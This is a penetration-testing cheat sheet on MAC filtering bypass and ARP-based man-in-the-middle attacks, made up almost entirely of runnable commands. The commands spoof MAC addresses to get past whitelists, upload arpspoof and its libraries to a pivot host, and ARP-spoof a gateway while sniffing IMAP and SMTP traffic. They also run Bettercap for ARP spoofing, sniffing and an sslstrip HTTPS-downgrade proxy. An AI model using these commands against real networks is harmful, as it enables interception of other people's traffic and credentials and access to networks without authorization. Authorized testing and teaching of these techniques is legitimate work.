MAC & ARP

MAC Filtering

Ethernet
sudo macchanger -a eth0
WiFi
sudo airmon-ng start wlan0
airodump-ng -c [channel] --bssid [target router MAC Address] -i wlan0mon  # Find whitelisted MAC addresses
sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
sudo macchanger -m [New MAC Address] wlan0
sudo ifconfig wlan0 up

ARP Spoofing

# Old technique but still usable sometimes
# You can spoof ARP traffic in order to discover new machines
# If you are pivoting through a machine, you may need to upload arpspoof on the target
scp /usr/sbin/arpspoof user@ip:/tmp

# Then, you may need to identify and upload the specific libraries it depends on
# WARNING: this can be dangerous for the target
ldd /usr/sbin/arpspoof 
scp <path> user@ip:/tmp
export LD_PRELOAD=./libnet.so.1

# Then you can run it on the target
# Example, spoof a gateway to discover a DC
arpspoof -i eth1 -t <victim> <impersonated machine>
 
# Terminal 2
tcpdump -i eth1 -A tcp port 143 or port 25

ARP Spoofing using Bettercap

# Activate router mode on attacker machine
echo 1 > /proc/sys/net/ipv4/ip_forward

# Show machines in the LAN
> net.show

# Set target for ARP spoofing
> set arp.spoof.targets 192.168.5.99

# Launch attack
> arp.spoof on

Proxy MiTM using Bettercap

# Configure sniffer verbosity
> set net.sniff.verbose false
> net.sniff on

# Then enable the SSL proxy (it will create an auto-generated SSL certificate)
> set http.proxy.sslstrip true
> http.proxy on